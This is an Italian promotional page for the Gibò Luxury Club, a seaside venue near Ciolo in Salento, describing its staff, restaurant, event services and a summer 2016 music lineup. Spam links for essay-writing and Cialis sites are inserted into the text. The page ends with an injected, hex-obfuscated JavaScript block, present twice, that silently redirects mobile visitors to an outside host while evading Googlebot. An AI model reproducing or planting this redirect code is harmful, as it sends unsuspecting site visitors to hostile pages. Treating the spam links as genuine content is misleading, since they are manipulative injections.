Incastonato sullo splendido promontorio roccioso che domina il famoso Canyon del Ciolo, tra macchia mediterranea, muretti a secco e con una vista mozzafiato sul tratto di mare che si staglia lungo la costa sud-est del Capo di Leuca, da oltre trent’anni il Gibò si presenta con tutto il suo fascino esclusivo in uno scenario unico al mondo.  Sorto quasi magicamente grazie all’estro e alla visione imprenditoriale del signor ownessay.com Gigi Costa ed oggi magistralmente plasmato dal know-how professionale di un collaudato team di donne e uomini altamente qualificato (Marta Costa Amministratrice; Alessandra Costa – Responsabile Risorse Umane; Leda Barba – Responsabile Marketing e Comunicazione; Giovanni Colella – Manager del settore Ricettivo e buy essay Ristorativo; Giovanni Spiri – Executive Chef), sia per le loro competenze che per il loro bagaglio di esperienze fortemente diversificate, questo meraviglioso http://www.cialisgeneriquefr24.com/cialis-perime/ Luxury Club si è aggiudicato il prestigioso riconoscimento come “Miglior Location d’Italia” assegnato durante il Monaco International Clubbing Show e questo grazie alla grande versatilità, all’estremo rigore nella ricerca dell’eccellenza e alla passione di persone che lavorano per realizzare i sogni della propria clientela.

La vostra calda estate in Salento, grazie all’atmosfera magica che solo il Gibò è in grado di offrirvi, si arricchirà di divertimento, glamour e piacere che potrete vivere grazie all’esibizione di artisti internazionali e allo spettacolare sorgere dell’alba sul mare Adriatico, con i primi raggi di sole che vi regaleranno emozioni indimenticabili. 

“IL GIBO’ NASCE DOVE L’ORIZZONTE SI SPALANCA SULL’INFINITO, DOVE LA ROCCIA SI FONDE CON LE ACQUE CRISTALLINE E SI HA LA SENSAZIONE DI ESSERE IN UN LUOGO CHE RARAMENTE SI E’ VISSUTO COME TALE. TOTALMENTE LIBERO DAI CONFINI DELLO SPAZIO E DEL TEMPO, E’ UNO SPETTACOLO SENZA FINE, DI QUELLI CHE RESTANO PER SEMPRE NELLA MEMORIA E NEL CUORE, PERCHE’ E’ ETERNO COME L’EMOZIONE CHE REGALA”

WWWGibò-Luxury-Club-&-Weddings-3

WWWGibò-Luxury-Club-&-Weddings-6WWWGibò-Luxury-Club-&-Weddings-018WWWGibò-Luxury-Club-&-Weddings-13Il Gibò non è solo un Club ma è anche Gibò 42 Restaurant, il raffinato spazio dedicato alla ristorazione à la carte con degustazione degli ottimi piatti proposti dall’Executive Chef Giovanni Spiri, grande artista del gusto che, come sempre, delizia i palati più esigenti regalando loro l’estasi del piacere con i capolavori della sua cucina a base delle eccellenze gastronomiche pugliesi ed in particolar modo salentine, senza mai prescindere dall’altissima qualità delle materie prime. L’area ristorante dispone fino a 220 posti a sedere, ideale per il pranzo o la cena di un matrimonio a 5 stelle, mentre l’esclusiva terrazza con vista mare si presta ad eventi privati, in particolar modo incontri che impongono riservatezza o semplicemente raccoglimento e concentrazione, riservati comunque ad un numero ristretto di invitati.

WWWGibò-Luxury-Club-&-Weddings-21WWWGibò-Luxury-Club-&-Weddings-26“SU SPLENDIDE TERRAZZE SPALANCATE SUL MARE, NELL’EMOZIONANTE ATMOSFERA DI UN LIVE SET D’ECCEZIONE, UN’ESPERIENZA DI GUSTO MAI PROVATA PRIMA, UN’ESPERIENZA IN CUI L’ARTE DEL CREARE DIVENTA PURA POESIA DEL PIACERE. TOTALE SUBLIMAZIONE DEI SENSI”

WWWGibò-Luxury-Club-&-Weddings-40

WWWGibò-Luxury-Club-&-Weddings-36
“UN TEMPIO DI BELLEZZA A STRAPIOMBO SUL MARE, UN CAPOLAVORO SENZA FINE, IL PIU’ SUGGESTIVO MAI REALIZZATO DAL TALENTO UMANO. LA CORNICE PERFETTA PER REALIZZARE IL PROPRIO MATRIMONIO NEL PIU’ ROMANTICO E POETICO DEGLI SCENARI. UNO DEI PIU’ AFFASCINANTI AL MONDO. UN SOGNO NEL SOGNO”

WWWGibò-Luxury-Club-&-Weddings-48“LA NOSTRA MISSIONE E’ FAR SENTIRE GLI OSPITI A CASA, GARANTIRE L’UNICITA’ DELL’EVENTO, ACCOGLIERE I CLIENTI CON IL RIGORE E LA QUALITA’ INDISCUSSA DEI SERVIZI OFFERTI, CON IL CALORE DELLA PASSIONE E L’ENTUSIASMO CHE ANIMANO IL GIBO’ E LA SUA ORGANIZZAZIONE, AFFINCHE’ TUTTO SIA VERAMENTE INDIMENTICABILE”

Il Gibò, nel suo incantevole scenario di ineguagliabile bellezza e ricco di fascino e tradizione, offre inoltre tutta la collaborazione necessaria ad organizzare e soprattutto personalizzare qualsiasi tipo di evento aziendale, garantendo professionalità e riservatezza e offrendo altissimi livelli di comfort sia prima che durante e dopo l’evento. Per la miglior soddisfazione dei clienti il Gibò mette a loro disposizione una molteplicità di soluzioni efficaci che vanno incontro alle esigenze del mondo del business grazie ad un rinnovato concept di ospitalità studiato ad hoc per l’organizzazione di eventi aziendali di piccole e grandi dimensioni: convention, congressi, meeting, conferenze, seminari, workshop, presentazioni ed esposizioni, set pubblicitari e cinematografici, progetti di formazione ed incentivi, riunioni di lavoro per gruppi ristretti, giornate di lavoro a tema, team building, training forza vendita, cene e pranzi di lavoro, aperitivi musicali e serate di gala. Grazie alle tecnologie audio, agli impianti luce più all’avanguardia e ad un’impeccabile organizzazione su misura, ogni evento aziendale e privato si trasforma in un’esperienza memorabile. Nello specifico le sale interne luminose e funzionali, di svariate dimensioni e tipologie, si prestano per grandi e piccole riunioni o congressi, mentre il meraviglioso salone offre un ambiente unico per cene e serate di gala.

WWWGibò-Luxury-Club-&-Weddings-42“PRESTIGIO E CHARME, ARMONIA E BELLEZZA, DECLINATI IN ALTISSIMA PROFESSIONALITA’ ED ECCELLENZA: QUESTI GLI OBIETTIVI CHE INTENDIAMO RAGGIUNGERE COSTANTEMENTE, PERCHE’ TUTTO SIA SEMPRE AL MEGLIO. CIO’ CHE DESIDERIAMO E’ RENDERE SPECIALE IL VOSTRO LAVORO AFFINCHE’ OGNI RIUNIONE SI TRASFORMI IN UN MOMENTO DI ENTUSIASMANTE E VULCANICA CREATIVITA’ CON IDEE BRILLANTI DA METTERE IN ATTO”

Il Gibò è una location prestigiosa e multifunzionale, in grado di adattarsi perfettamente alle necessità dei propri clienti e a quelle del mondo del business, garantendo tradizione ed innovazione, prestigio e mondanità, bellezza e funzionalità, offrendo la molteplicità dei suoi spazi al servizio di ogni tipologia di evento:

  • Matrimoni
  • Cerimonie civili e simboliche
  • Filming and Shooting
  • Club Events
  • Eventi aziendali di ogni genere
  • Corporate and Business Events
  • Conferenze, Convegni e Meeting aziendali
  • Galas
  • Cene esclusive su terrazza panoramica privata
  • Cene romantiche a lume di candela
  • Feste di compleanno; Feste in costume; Feste di fidanzamento
  • Anniversari
  • Sfilate di moda
  • Set Cinematografici e Pubblicitari
  • Shooting e video fotografici
  • Presentazione di libri ed opere d’arte
  • Intrattenimenti e spettacoli musicali
  • Feste a tema
  • Diplomi e feste di Laurea

Grazie ad una profonda conoscenza del territorio consolidata negli anni, l’organizzazione Gibò può contare su una rete di Partners di assoluta eccellenza, capaci di garantire massima professionalità, competenza e un altissimo livello di personalizzazione nella totalità dei seguenti servizi:

  • Ricerca e prenotazione Hotel & Accomodation
  • Customised and Personalised Wedding and Event Projects
  • Wedding Planners
  • Pianificazione Eventi
  • Allestimenti floreali
  • Catering
  • Fotografia e Video
  • Ricerca e selezione Artisti
  • Impianto sonoro
  • Live set e D.J. set
  • Spettacoli pirotecnici
  • Transfer e noleggio auto
  • Limousine services
  • Progettazione Aree
  • Assistenza tecnica continua
  • Impianti video, proiezione, registrazione
  • Impianti audio 
  • Impianti illuminazione
  • Servizi informatici
  • Luxury Club and Restaurant table reservation
  • V.I.P. table reservation
  • Security and V.I.P. protection
  • Hostesses
  • Babysitting services

L’intera macchina organizzativa del Gibò sarà attiva dal 4 agosto con una programmazione artistica e musicale senza precedenti nella storia della location; quest’estate come non mai lo staff del Gibò offrirà a tutti i clienti un’esperienza unica con un focus particolare sull’eccellenza qualitativa di uno spettacolo indimenticabile. Il Gibò si trasformerà in un vero e proprio palcoscenico spalancato sul mare, capace di esplodere in tutta la sua potenza e unicità per la straordinarietà dei talenti e degli artisti che si esibiranno. Protagonisti del palcoscenico Gibò, durante il prossimo mese d’agosto, saranno ancora una volta David Blank e Michelle Perera che continueranno ad impreziosire le notti del Gibò con le loro splendide voci e le loro spettacolari performance. Ricky Morrison, uno dei migliori esponenti della House Music del Regno Unito, sarà lo Special Guest della sera di Ferragosto, mentre Carlton Jumel Smith sarà la novità assoluta dell’estate 2016: l’artista americano di fama internazionale si esibirà per la prima volta in Italia con un’esibizione mai vista prima e renderà ancor più esclusiva ogni notte del Gibò, direttamente da New York (la sua storica partecipazione al programma ufficiale Gibò è merito dell’ottimo lavoro svolto proprio nei giorni scorsi da una bravissima professionista della Comunicazione qual è Leda Barba).

Fascino e divertimento all’ennesima potenza, dalla mezzanotte fino alle prime luci dell’alba, il Gibò diventerà un luogo dove tutto sarà possibile grazie all’energia travolgente dei Dj Frank Riezzo, Gianni Rafaskieri, Morris, Maurizio Macrì, Massimiliano Todrai e Raffy. Gli ospiti saranno invitati a vivere un’esperienza totalizzante, una vera e propria full immersion di emozioni tra spettacolo, dress code, atmosfere glamour, eleganza, ricercatezza e voci blues, neo-soul e R&B. Il Gibò intende confermarsi anche quest’anno come la più esclusiva location del Sud Italia, la stessa che ha contribuito alla fama del Salento in Italia e nel mondo!

GIBO’ LUXURY CLUB

LOCALITA’ CIOLO, LITORANEA S. MARIA DI LEUCA-OTRANTO KM 5

73034 CIOLO – GAGLIANO DEL CAPO (LECCE)

info@gibo.it   Tel. 0833-548979  www.gibo.it 

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}